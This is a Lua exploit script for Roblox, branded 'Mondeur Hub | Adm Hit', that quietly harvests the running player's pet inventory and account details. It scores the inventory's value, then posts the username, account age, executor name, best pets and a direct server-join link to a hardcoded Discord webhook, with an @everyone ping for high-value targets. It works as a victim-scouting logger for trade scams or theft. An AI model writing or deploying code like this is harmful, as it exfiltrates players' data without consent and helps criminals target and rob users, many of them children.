--// MONDEUR HUB | ADM HIT 🦊 (MASTERPIECE - 0 ERRORS)

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage"):WaitForChild("ClientModules"):WaitForChild("Core"):WaitForChild("ClientData"))

local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"
local request = (syn and syn.request) or (http and http.request) or http_request or request

if not request then return end

local LOW_THRESHOLD = 300
local HIGH_THRESHOLD = 1500
local rarityPriority = {legendary=5, ultra_rare=4, rare=3, uncommon=2, common=1}
local rarityColors = {legendary=0xFFD700, ultra_rare=0xA020F0, rare=0x1E90FF, uncommon=0x32CD32, common=0xB0B0B0}

-- =========================
-- MASTER CLEAN PET NAME
-- =========================
local function cleanPetName(id)
    if not id then return nil end
    local name = tostring(id):lower():gsub("_", " ")
    
    -- BLOCK UNTRADEABLE
    local blocks = {"egg", "jerboa", "starter", "practice", "minigame"}
    for _, block in ipairs(blocks) do
        if name:find(block) then return nil end
    end
    
    -- CLEAN & FORMAT
    name = name:gsub("%d", ""):gsub("%s+", " "):gsub("^%s+",""):gsub("%s+$","")
    return name:sub(1,1):upper() .. name:sub(2)
end

-- =========================
-- EMOJI MASTER
-- =========================
local function getEmoji(name, pet)
    local e = ""
    local n = name:lower()
    if n:find("fox") then e = "🦊"
    elseif n:find("bee") then e = "🐝"
    elseif n:find("dog") then e = "🐕"
    elseif n:find("cat") then e = "🐱"
    end
    
    if pet.mega then e = e .. "🌈" end
    if pet.neon then e = e .. "🟣" end
    if pet.ride then e = e .. "🏇" end
    if pet.fly then e = e .. "🪽" end
    
    return e ~= "" and e or "🐾"
end

-- =========================
-- PET PROCESSOR (FLAWLESS)
-- =========================
local function processPets(rawPets)
    local pets = {}
    local total = 0
    
    for _, pet in pairs(rawPets or {}) do
        if pet and pet.id then
            local cleanName = cleanPetName(pet.id)
            if not cleanName then continue end
            
            local key = cleanName
            if not pets[key] then
                pets[key] = {
                    name = cleanName,
                    count = 0,
                    rarity = (pet.rarity or "common"):lower(),
                    neon = pet.neon or (pet.properties and pet.properties.neon),
                    mega = pet.mega or (pet.properties and pet.properties.mega),
                    ride = pet.rideable or (pet.properties and pet.properties.rideable),
                    fly = pet.flyable or (pet.properties and pet.properties.flyable)
                }
            end
            
            pets[key].count = pets[key].count + 1
            total = total + 10
        end
    end
    
    local list = {}
    for _, data in pairs(pets) do
        table.insert(list, data)
    end
    
    -- FLAWLESS SORTING
    table.sort(list, function(a, b)
        local aP = rarityPriority[a.rarity] or 1
        local bP = rarityPriority[b.rarity] or 1
        if aP ~= bP then return aP > bP end
        return a.count > b.count
    end)
    
    return list, total
end

-- =========================
-- CLEAN FORMAT
-- =========================
local function formatList(pets)
    local lines = {}
    for i = 1, math.min(12, #pets) do
        local p = pets[i]
        lines[i] = getEmoji(p.name, p) .. " " .. p.name .. " x" .. p.count
    end
    return table.concat(lines, "\n")
end

-- =========================
-- WEBHOOK SENDER (MASTER)
-- =========================
local function send()
    local success, inventory = pcall(function() return ClientData.get("inventory") end)
    if not success or not inventory then return end
    
    local petsRaw = inventory.pets or {}
    local petList, total = processPets(petsRaw)
    
    local best = petList[1]
    local bestName = best and best.name .. " x" .. best.count or "None"
    local bestRarity = best and best.rarity or "common"
    
    local tier = total >= HIGH_THRESHOLD and "🔴 HIGH" or total >= LOW_THRESHOLD and "🟡 MID" or "🟢 LOW"
    local content = tier == "🔴 HIGH" and "@everyone" or ""
    local color = rarityColors[bestRarity] or 0x2F3136
    
    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description = "```" ..
            "👤 " .. game.Players.LocalPlayer.DisplayName .. "\n"..
            "🆔 " .. game.Players.LocalPlayer.Name .. "\n"..
            "📅 " .. game.Players.LocalPlayer.AccountAge .. " days\n"..
            "📱 " .. (identifyexecutor and identifyexecutor() or "Unknown") .. "\n"..
            "👥 " .. #game.Players:GetPlayers() .. "/" .. game.Players.MaxPlayers .. "\n"..
            "💰 " .. total .. "\n"..
            "📊 " .. tier .. "```",
        fields = {
            {name="🏆 Best Pet", value="```"..bestName.."```"},
            {name="🐶 Pets", value="```"..formatList(petList).."```"},
            {name="🌐 Server", value="[Join](".."https://www.roblox.com/games/start?placeId="..game.PlaceId.."&instanceId="..game.JobId..")"}
        },
        color = color,
        footer = {text="Mondeuronbotton"}
    }
    
    pcall(function()
        request({
            Url = WEBHOOK,
            Method = "POST",
            Headers = {["Content-Type"]="application/json"},
            Body = HttpService:JSONEncode({content=content, embeds={embed}})
        })
    end)
    
    print("✅ Sent -", #petList, "tradeable pets")
end

send()
